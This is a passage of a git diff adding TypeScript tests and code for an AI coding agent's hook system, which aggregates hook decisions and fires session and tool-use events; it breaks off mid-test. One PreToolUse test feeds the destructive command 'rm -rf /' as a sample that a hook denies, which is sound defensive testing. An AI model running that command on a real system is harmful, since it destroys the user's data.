'PostToolUse', + additionalContext: 'ctx2', + }, + }, ]; const results: HookExecutionResult[] = outputs.map((output) => ({ @@ -194,9 +203,6 @@ describe('HookAggregator', () => { results, HookEventName.PostToolUse, ); - expect( - result.finalOutput?.hookSpecificOutput?.['tailToolCallRequest'], - ).toEqual({ name: 'A' }); expect( result.finalOutput?.hookSpecificOutput?.['additionalContext'], ).toBe('ctx\nctx2'); @@ -615,4 +621,177 @@ describe('HookAggregator', () => { expect(result.finalOutput?.decision).toBe('allow'); }); }); + + describe('SubagentStop - mergeWithOrLogic', () => { + it('should use mergeWithOrLogic for SubagentStop event', () => { + const outputs: HookOutput[] = [ + { reason: 'first reason', decision: 'allow' }, + { reason: 'second reason', decision: 'allow' }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput?.reason).toBe('first reason\nsecond reason'); + }); + + it('should block when any SubagentStop hook blocks', () => { + const outputs: HookOutput[] = [ + { reason: 'output looks good', decision: 'allow' }, + { reason: 'output too short', decision: 'block' }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput?.decision).toBe('block'); + }); + + it('should concatenate additionalContext for SubagentStop', () => { + const outputs: HookOutput[] = [ + { hookSpecificOutput: { additionalContext: 'context from hook 1' } }, + { hookSpecificOutput: { additionalContext: 'context from hook 2' } }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect( + result.finalOutput?.hookSpecificOutput?.['additionalContext'], + ).toBe('context from hook 1\ncontext from hook 2'); + }); + + it('should handle continue=false for SubagentStop', () => { + const outputs: HookOutput[] = [ + { continue: true }, + { continue: false, stopReason: 'subagent should stop' }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput?.continue).toBe(false); + expect(result.finalOutput?.stopReason).toBe('subagent should stop'); + }); + }); + + describe('createSpecificHookOutput - SubagentStop', () => { + it('should create StopHookOutput for SubagentStop', () => { + const output: HookOutput = { + decision: 'block', + reason: 'Output too short', + }; + const results: HookExecutionResult[] = [ + { + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + }, + ]; + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput).toBeDefined(); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe('Output too short'); + }); + + it('should create StopHookOutput with isBlockingDecision for SubagentStop', () => { + const output: HookOutput = { + decision: 'block', + reason: 'Continue working on the task', + }; + const results: HookExecutionResult[] = [ + { + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + }, + ]; + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + + // Verify the output can be consumed by StopHookOutput accessors + const hookOutput = createHookOutput( + HookEventName.SubagentStop, + result.finalOutput ?? {}, + ); + expect(hookOutput.isBlockingDecision()).toBe(true); + expect(hookOutput.getEffectiveReason()).toBe( + 'Continue working on the task', + ); + }); + + it('should create StopHookOutput with allow decision for SubagentStop', () => { + const output: HookOutput = { + decision: 'allow', + reason: 'Output looks complete', + }; + const results: HookExecutionResult[] = [ + { + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + }, + ]; + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + + const hookOutput = createHookOutput( + HookEventName.SubagentStop, + result.finalOutput ?? {}, + ); + expect(hookOutput.isBlockingDecision()).toBe(false); + }); + }); }); diff --git a/packages/core/src/hooks/hookAggregator.ts b/packages/core/src/hooks/hookAggregator.ts index ea7cf2090..32da197cb 100644 --- a/packages/core/src/hooks/hookAggregator.ts +++ b/packages/core/src/hooks/hookAggregator.ts @@ -8,6 +8,8 @@ import { HookEventName, DefaultHookOutput, PreToolUseHookOutput, + PostToolUseHookOutput, + PostToolUseFailureHookOutput, StopHookOutput, PermissionRequestHookOutput, } from './types.js'; @@ -89,7 +91,8 @@ export class HookAggregator { case HookEventName.PostToolUseFailure: case HookEventName.Stop: case HookEventName.UserPromptSubmit: - merged = this.mergeWithOrLogic(outputs); + case HookEventName.SubagentStop: + merged = this.mergeWithOrLogic(outputs, eventName); break; case HookEventName.PermissionRequest: merged = this.mergePermissionRequestOutputs(outputs); @@ -109,8 +112,12 @@ export class HookAggregator { * - Reasons are concatenated with newlines * - continue=false takes precedence over continue=true * - Additional context is concatenated + * - For PostToolUse, decision and reason are required fields */ - private mergeWithOrLogic(outputs: HookOutput[]): HookOutput { + private mergeWithOrLogic( + outputs: HookOutput[], + _eventName?: HookEventName, + ): HookOutput { const merged: HookOutput = {}; const reasons: string[] = []; const additionalContexts: string[] = []; @@ -337,7 +344,12 @@ export class HookAggregator { switch (eventName) { case HookEventName.PreToolUse: return new PreToolUseHookOutput(output); + case HookEventName.PostToolUse: + return new PostToolUseHookOutput(output); + case HookEventName.PostToolUseFailure: + return new PostToolUseFailureHookOutput(output); case HookEventName.Stop: + case HookEventName.SubagentStop: return new StopHookOutput(output); case HookEventName.PermissionRequest: return new PermissionRequestHookOutput(output); diff --git a/packages/core/src/hooks/hookEventHandler.test.ts b/packages/core/src/hooks/hookEventHandler.test.ts index f556a8c30..9bffed8bb 100644 --- a/packages/core/src/hooks/hookEventHandler.test.ts +++ b/packages/core/src/hooks/hookEventHandler.test.ts @@ -6,7 +6,17 @@ import { describe, it, expect, vi, beforeEach, type Mock } from 'vitest'; import { HookEventHandler } from './hookEventHandler.js'; -import { HookEventName, HookType, HooksConfigSource } from './types.js'; +import { + HookEventName, + HookType, + HooksConfigSource, + SessionStartSource, + SessionEndReason, + PermissionMode, + AgentType, + PreCompactTrigger, + NotificationType, +} from './types.js'; import type { Config } from '../config/config.js'; import type { HookPlanner, @@ -14,7 +24,7 @@ import type { HookAggregator, AggregatedHookResult, } from './index.js'; -import type { HookConfig, HookOutput } from './types.js'; +import type { HookConfig, HookOutput, PermissionSuggestion } from './types.js'; describe('HookEventHandler', () => { let mockConfig: Config; @@ -192,6 +202,204 @@ describe('HookEventHandler', () => { }); }); + describe('fireSessionStartEvent', () => { + it('should execute hooks for SessionStart event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Startup, + 'test-model', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SessionStart, + { trigger: SessionStartSource.Startup }, + ); + expect(result.success).toBe(true); + }); + + it('should include all session start parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Resume, + 'test-model', + PermissionMode.Plan, + AgentType.Bash, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + source: SessionStartSource; + model: string; + agent_type?: AgentType; + }; + expect(input.permission_mode).toBe(PermissionMode.Plan); + expect(input.source).toBe(SessionStartSource.Resume); + expect(input.model).toBe('test-model'); + expect(input.agent_type).toBe(AgentType.Bash); + }); + + it('should use default permission mode when not provided', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Clear, + 'test-model', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Default); + }); + + it('should handle session start event with undefined agent type', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Compact, + 'test-model', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + source: SessionStartSource; + model: string; + agent_type?: AgentType; + }; + expect(input.source).toBe(SessionStartSource.Compact); + expect(input.model).toBe('test-model'); + expect(input.agent_type).toBeUndefined(); + }); + }); + + describe('fireSessionEndEvent', () => { + it('should execute hooks for SessionEnd event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSessionEndEvent( + SessionEndReason.Clear, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SessionEnd, + { trigger: SessionEndReason.Clear }, + ); + expect(result.success).toBe(true); + }); + + it('should include reason in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionEndEvent(SessionEndReason.Logout); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { reason: SessionEndReason }; + expect(input.reason).toBe(SessionEndReason.Logout); + }); + + it('should handle different session end reasons', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test all possible session end reasons + const testReasons = [ + SessionEndReason.Clear, + SessionEndReason.Logout, + SessionEndReason.PromptInputExit, + SessionEndReason.Bypass_permissions_disabled, + SessionEndReason.Other, + ]; + + for (const reason of testReasons) { + await hookEventHandler.fireSessionEndEvent(reason); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[mockCalls.length - 1][2] as { + reason: SessionEndReason; + }; + expect(input.reason).toBe(reason); + } + }); + }); + describe('sequential vs parallel execution', () => { it('should execute hooks sequentially when plan.sequential is true', async () => { const mockPlan = createMockExecutionPlan( @@ -274,5 +482,1767 @@ describe('HookEventHandler', () => { expect(result.errors).toHaveLength(1); expect(result.errors[0].message).toBe('Runner error'); }); + + it('should handle errors for SessionStart event', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SessionStart planner error'); + }); + + const result = await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Startup, + 'test-model', + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SessionStart planner error'); + }); + + it('should handle errors for SessionEnd event', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SessionEnd planner error'); + }); + + const result = await hookEventHandler.fireSessionEndEvent( + SessionEndReason.Clear, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SessionEnd planner error'); + }); + }); + + describe('firePostToolUseFailureEvent', () => { + it('should execute hooks for PostToolUseFailure event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test123', + 'test-tool', + { param: 'value' }, + 'An error occurred', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUseFailure, + { toolName: 'test-tool' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test456', + 'shell', + { command: 'ls' }, + 'Command failed', + true, + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_use_id: string; + tool_name: string; + tool_input: Record; + error: string; + is_interrupt: boolean; + }; + + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.tool_use_id).toBe('toolu_test456'); + expect(input.tool_name).toBe('shell'); + expect(input.tool_input).toEqual({ command: 'ls' }); + expect(input.error).toBe('Command failed'); + expect(input.is_interrupt).toBe(true); + }); + + it('should handle default values for optional parameters', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test789', + 'test-tool', + { param: 'value' }, + 'An error occurred', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + is_interrupt?: boolean; + }; + + expect(input.permission_mode).toBe(PermissionMode.Default); // Should default to Default + expect(input.is_interrupt).toBeUndefined(); // Should be undefined when not provided + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test123', + 'special-tool', + { param: 'value' }, + 'Error occurred', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUseFailure, + { toolName: 'special-tool' }, // Context with tool name + ); + }); + + it('should handle successful execution with final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + reason: 'Processing error', + hookSpecificOutput: { + additionalContext: 'Additional failure context', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test999', + 'test-tool', + { param: 'value' }, + 'Error occurred', + ); + + expect(result.success).toBe(true); + expect(result.finalOutput).toBeDefined(); + expect(result.finalOutput?.reason).toBe('Processing error'); + }); + + it('should handle multiple hooks execution', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo hook1', + source: HooksConfigSource.Project, + }, + { + type: HookType.Command, + command: 'echo hook2', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test111', + 'multi-tool', + { params: ['a', 'b'] }, + 'Multiple errors', + ); + + expect(mockHookRunner.executeHooksParallel).toHaveBeenCalledTimes(1); + expect(mockHookRunner.executeHooksParallel).toHaveBeenCalledWith( + [ + { + type: HookType.Command, + command: 'echo hook1', + source: HooksConfigSource.Project, + }, + { + type: HookType.Command, + command: 'echo hook2', + source: HooksConfigSource.Project, + }, + ], + HookEventName.PostToolUseFailure, + expect.any(Object), // input object + expect.any(Function), // onHookStart callback + expect.any(Function), // onHookEnd callback + ); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_sequential', + 'seq-tool', + { param: 'value' }, + 'Sequential error', + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + }); + + describe('firePreToolUseEvent', () => { + it('should execute hooks for PreToolUse event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreToolUseEvent( + 'test-tool', + { param: 'value' }, + 'toolu_test123', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreToolUse, + { toolName: 'test-tool' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreToolUseEvent( + 'shell', + { command: 'ls -la' }, + 'toolu_abc456', + PermissionMode.Plan, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_name: string; + tool_input: Record; + tool_use_id: string; + }; + + expect(input.permission_mode).toBe(PermissionMode.Plan); + expect(input.tool_name).toBe('shell'); + expect(input.tool_input).toEqual({ command: 'ls -la' }); + expect(input.tool_use_id).toBe('toolu_abc456'); + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePreToolUseEvent( + 'Bash', + { command: 'npm test' }, + 'toolu_xyz789', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreToolUse, + { toolName: 'Bash' }, + ); + }); + + it('should handle permission decision in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + hookSpecificOutput: { + hookEventName: 'PreToolUse', + permissionDecision: 'deny', + permissionDecisionReason: 'Dangerous command blocked', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreToolUseEvent( + 'Bash', + { command: 'rm -rf /' }, + 'toolu_danger', + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.hookSpecificOutput).toEqual({ + hookEventName: 'PreToolUse', + permissionDecision: 'deny', + permissionDecisionReason: 'Dangerous command blocked', + }); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePreToolUseEvent( + 'test-tool', + { param: 'value' }, + 'toolu_seq', + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PreToolUse planner error'); + }); + + const result = await hookEventHandler.firePreToolUseEvent( + 'test-tool', + { param: 'value' }, + 'toolu_error', + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PreToolUse planner error'); + }); + }); + + describe('firePostToolUseEvent', () => { + it('should execute hooks for PostToolUse event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseEvent( + 'test-tool', + { param: 'value' }, + { result: 'success' }, + 'toolu_test123', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUse, + { toolName: 'test-tool' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseEvent( + 'shell', + { command: 'ls -la' }, + { files: ['a.txt', 'b.txt'] }, + 'toolu_abc456', + PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_name: string; + tool_input: Record; + tool_response: Record; + tool_use_id: string; + }; + + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.tool_name).toBe('shell'); + expect(input.tool_input).toEqual({ command: 'ls -la' }); + expect(input.tool_response).toEqual({ files: ['a.txt', 'b.txt'] }); + expect(input.tool_use_id).toBe('toolu_abc456'); + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + await hookEventHandler.firePostToolUseEvent( + 'Write', + { file_path: '/test.txt', content: 'hello' }, + { success: true }, + 'toolu_write123', + PermissionMode.Default, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUse, + { toolName: 'Write' }, + ); + }); + + it('should handle decision block in final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + decision: 'block', + reason: 'Lint errors detected', + hookSpecificOutput: { + hookEventName: 'PostToolUse', + additionalContext: 'Please fix the lint errors', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseEvent( + 'Write', + { file_path: '/test.ts', content: 'const x = 1' }, + { success: true }, + 'toolu_lint', + PermissionMode.Default, + ); + + expect(result.success).toBe(true); + expect(result.finalOutput?.decision).toBe('block'); + expect(result.finalOutput?.reason).toBe('Lint errors detected'); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseEvent( + 'test-tool', + { param: 'value' }, + { result: 'ok' }, + 'toolu_seq', + PermissionMode.Default, + ); + + expect(mockHookRunner.executeHooksSequential).toHaveBeenCalled(); + expect(mockHookRunner.executeHooksParallel).not.toHaveBeenCalled(); + }); + + it('should handle errors gracefully', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('PostToolUse planner error'); + }); + + const result = await hookEventHandler.firePostToolUseEvent( + 'test-tool', + { param: 'value' }, + { result: 'ok' }, + 'toolu_error', + PermissionMode.Default, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('PostToolUse planner error'); + }); + }); + + describe('firePreCompactEvent', () => { + it('should execute hooks for PreCompact event with manual trigger', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Manual, + 'Keep important code', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreCompact, + { trigger: PreCompactTrigger.Manual }, + ); + expect(result.success).toBe(true); + }); + + it('should execute hooks for PreCompact event with auto trigger', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePreCompactEvent( + PreCompactTrigger.Auto, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PreCompact, + { trigger: PreCompactTrigger.Auto }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + 